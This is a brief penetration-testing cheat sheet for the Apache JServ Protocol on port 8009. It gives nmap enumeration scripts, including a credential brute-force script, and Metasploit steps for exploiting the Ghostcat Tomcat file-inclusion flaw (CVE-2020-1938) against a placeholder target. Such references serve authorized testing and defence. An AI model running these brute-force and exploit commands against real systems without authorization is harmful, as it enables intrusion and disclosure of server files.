AJP (Apache JServ Protocol) Pentesting
Last modified: 2022-11-22
AJP is a binary protocol that can proxy inbound requests from a web server through to an application server that sits behind the web server. A default port is 8009.
Enumeration
nmap --script ajp-auth -p 8009 <target-ip>
nmap --script ajp-auth --script-args ajp-auth.path=/login -p 8009 <target-ip>
nmap --script ajp-brute -p 8009 <target-ip>
nmap --script ajp-headers -p 8009 <target-ip>
nmap --script ajp-methods -p 8009 <target-ip>
nmap --script ajp-request -p 8009 <target-ip>
Ghostcat File Inclusion
It's a vulnerability of Tomcat AJP (CVE-2020-1938).
Use Metasploit for exploiting it.
msfconsole
msf6 > use auxiliary/admin/http/tomcat_ghostcat
msf6 auxiliary(admin/http/tomcat_ghostcat) > set rhosts <target-ip>
msf6 auxiliary(admin/http/tomcat_ghostcat) > exploit